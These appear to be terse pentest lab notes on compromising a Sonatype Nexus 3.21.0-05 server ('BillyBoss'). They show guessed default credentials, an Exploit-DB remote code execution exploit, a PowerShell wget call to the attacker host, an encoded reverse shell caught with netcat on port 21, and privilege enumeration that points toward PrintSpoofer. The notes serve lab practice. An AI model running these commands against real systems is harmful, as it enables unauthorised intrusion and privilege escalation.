4 :8081

http://192.168.154.61:8081/
Landing Page - Sonatype Nexus Repository Manager
OSS 3.21.0-05

# google
# 2 login users
- admin (all privileges)
- anonymous (R-only)

# default creds not working
# no other attack vectors; time to cewl
# nexus:nexus

Using https://www.exploit-db.com/exploits/49385
# ping works but ports are blocked
# tried to confirm if ports are working
CMD='powershell.exe -c wget 192.168.49.122:21/kashz'

# working ports: 21, 80, 8081

# generate encoded ps
$ python3 /opt/powershell_encoded_revshell/powershell_encoded_revshell.py 192.168.49.122 21

$ nc -lvnp 21
listening on [any] 21 ...
connect to [192.168.49.122] from (UNKNOWN) [192.168.122.61] 49837

PS C:\Users\nathan\Nexus\nexus-3.21.0-05> whoami
billyboss\nathan

PS C:\Users\nathan\Nexus\nexus-3.21.0-05> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled

PS C:\Users\nathan\Nexus\nexus-3.21.0-05> systeminfo

Host Name:                 BILLYBOSS
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.18362 N/A Build 18362
System Type:               x64-based PC
Hotfix(s):                 6 Hotfix(s) Installed.

# printSpoofer is definitely one way